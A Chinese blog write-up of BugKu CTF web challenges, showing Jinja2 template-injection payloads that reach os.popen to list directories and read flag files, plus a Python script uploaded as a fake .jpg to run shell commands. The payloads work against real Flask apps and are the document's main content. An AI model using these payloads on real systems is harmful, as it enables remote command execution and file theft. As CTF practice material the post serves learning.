BugKu-web

于 2024-07-30 20:11:44 发布
阅读量239 收藏 4
点赞数 9
分类专栏: bugku-web 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66105152/article/details/140805538
版权

Simple_SSTI_1

查看页面源代码发现最后有一行注释

就是说:在flask中,设置了一个secret_key变量

  1. 随便传参看看有何变化,测试一下

http://114.67.175.224:17329/?flag={{1}}

可以正常显示传入的数据。

  1. 传入可能得文件
http://114.67.175.224:17329/?flag={{6*6}}
http://114.67.175.224:17329/?flag={{flag.html}}

发现flag未定义

直接测试config.SECRET_KEY

http://114.67.175.224:18052/?flag={{config.SECRET_KEY}}

Simple_SSTI_2

试一试

http://114.67.175.224:12482/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

__class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。

__init__ 初始化类,返回的类型是function

__globals__[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。

os.popen() 方法用于从一个命令打开一个管道。

open() 方法用于打开一个文件,并返回文件对象

http://114.67.175.224:19248/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../app/%27).read()%20}}

直接cat

http://114.67.175.224:19248/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

Flask_FileUpload

查看页面源代码,提示需要提交python

直接上传python脚本,修改包的文件扩展名为jpg

import os
os.system('ls ../')
os.system('cat ../flag')

滑稽

fn+f12

计算器

发现验证码32+82应该为3位数,可是表单中输入框最大长度为1,所以修改一下把1变成3

╰落叶梧桐细数悲伤゛
关注
  • 9
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugKu CTF之 Simple_SSTI_2
weixin_42557264的博客
09-16 1898
进入场景 和Simple_SSTI_1一样 提示需要传一个flag参数 F12也没有任何其他提示 ls一下看看内部文件 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 发现存在一些文件夹,进入查看,先看看第一个,运气很好,第一个app文件夹里就有flag 因为没有过滤直接cat …/app/flag ?flag={{%20config.__clas.
BUGKU-WEB
wojiushilsy的博客
02-22 510
5.矛盾 打开链接,内容如下: $num=$_GET['num']; if(!is_numeric($num)) { echo $num; if($num==1) echo 'flag{**********}'; } is_numeric():检测字符串是否只由数字组成,如果字符串中只包括数字,就返回Ture,否则返回False。(注意是只包括数字) 要求我们不能输入纯数字1,但是num...
[bugku]Simple_SSTI_2
ZhShy
03-10 3423
进入页面之后F12没发现什么有用的东西。 照例看看config: http://114.67.175.224:12482/?flag={{config}} 没有flag 试一试 http://114.67.175.224:12482/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} __class__:用来查看变量所属的类,根据前面的变量形式可以得到其所属的类。 __i
Bugku Simple_SSTI_2
qq_52718293的博客
10-23 2550
首先打开之后是上面这样,题目有提示是ssti,所以
Bugku:Simple_SSTI_2
weixin_52599204的博客
08-05 420
然后发现里面直接显示了 那么接下来就是找系统命令执行语句的语法。由于题目提示是模板注入,于是直接上payload。说实话原来也没怎么了解过这个框架 于是找了找命令。首先打开环境 提示需要传一个flag参数。这里引用大佬的博客 感兴趣的可以去看看。找到圈起来这条 把里面的。...
BUGKU-WEB Simple_SSTI_2
天泽岁月
02-06 573
BUGKU-WEB Simple_SSTI_2
BugKu Web(前20)
kid的博客
05-25 6618
BugKu Web(前20) 前言 练习ctf,bugku web前20道,文件上传打不开网页没做 题目 web2 一堆滑稽动图…查看源码,右键没有查看源码(可能被禁用了),ctrl+u查看源码拿到flag 计算器 一个验证码码框第一反应是验证码绕过,但输入的时候发现限制输入,使用Noscript来禁js发现不行,根本就与服务器进行通信。看来是要看js了,找到js代码(最烦代码审计了,j...
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
Bugku-web之成绩查询
weixin_42939822的博客
03-14 3464
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
旧版Bugku-Web题目下载及write up(相对简单).doc
最新发布
08-24
旧版Bugku-Web题目下载及write up(相对简单)
bugku-web-滑稽
weixin_46168073的博客
11-11 1504
Bugku-web-滑稽解析过程。 一、启动场景 首先,我们启动场景。(点击启动)。 选择OK,注册bugku会送金币,不用担心。 百度bugku就行 二、进入环境 然后我们进入环境。 点击超链接进入环境。 三、做题思路 可以看到是一堆滑稽,而且会越来越快的出现。做为一个新手,我们直接按F12,检查HTML代码。 可以看到flag就藏在其中。 复制flag,<!--flag{73a8b9807007d4d0cbead418e02add9...
bugku-web-GET解析过程
weixin_46168073的博客
11-14 1046
一、启动场景 二、解题过程 点进去得到 可以看到这是一个if语句,判断条件为what=='flag'就会显示出echo 下的'flag",那我们直接在地址后面,写上?what=flag。 然后就得到了flag,直接复制粘贴到记事本,然后在复制粘贴到提交框。 点击提交。 ...
Bugku [Simple_SSTI_2](基于ctf题目学习SSTI服务器模板注入)
MAHRE_Z的博客
11-09 789
打开网址发现一串英文,提示“You need pass in a parameter named flag”(“您需要传入一个名为 flag 的参数”),根据题目提示SSTI,搜索一下SSTI,发现一篇文章介绍。显示为flag参数的值,可以知道页面会显示被传入flag参数的值,然后进行报错看一看网站使用的模板类型。不错,其中有讲到什么是注入,说是格式化字符串漏洞的一种体现,然后我就又找了一篇关于。发现目录,进入app目录,发现flag文件。用cat命令查看flag,得到flag。
十九、bugku Simple_SSTI_2
山兔的博客
09-06 441
/?flag={{ config.__class__.__init__.__globals__['os'] .popen('ls ../').read() }} ?flag={{ config.__class__.__init__.__globals__['os'] .popen('cat ../app/flag').read() }} __class__:返回对象所属类 __init__:类的初始方法,用以初始化实例.实际上魔术方法 __new__与__init__共同作为"构造函数",__new_
【愚公系列】2023年06月 Bugku-Web(Simple_SSTI_2)
时光隧道
06-22 6093
Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。Flask提供了基本的Web开发所需的组件,如路由、请求和响应处理、会话管理、模板渲染等,同时还支持各种第三方扩展和插件,可以轻松地实现各种复杂的Web应用开发。Flask框架也因其灵活性和简易性而广受欢迎,被许多Web开发者用于构建Web应用和API。Flask是一个使用Python编写的轻量级Web应用框架。它的设计目标是简单明了,易于扩展和维护。
Bugku WEB Simple_SSTI_2
lin的博客
04-12 1552
1. 打开后,题目提示存在模板注入 2. 先进行ls查看一下存在的文件。 /?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}} 根据URL转换表,%20 -> 空格 %27 -> ', 上面的URL对应字符串为: /?flag={{ config.__class__.__init__.__globals__['os'].popen('ls ../').read(
WEB Simple_SSTI_2
m0_57954651的博客
05-02 453
打开题目 似乎和第一题有相同之处 先来测试一下有没有类似注入的漏洞 回显正常 说明方向没错 再此构造 ?flag={{''.__class__.__mro__}}(借鉴大佬..) 用mro回显到了两类 str object 我们可利用第二的object来作突破 THEN 利用subclasses这个参数 __subclasses__属性会输出该类下所有的子类 ?flag={{''.__class__.__mro__[1].__subclasses__() }} 看到了里面的...
Simple_SSTI_2
qq_44724114的博客
04-09 579
然后来到tplmap的目录下运行:
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值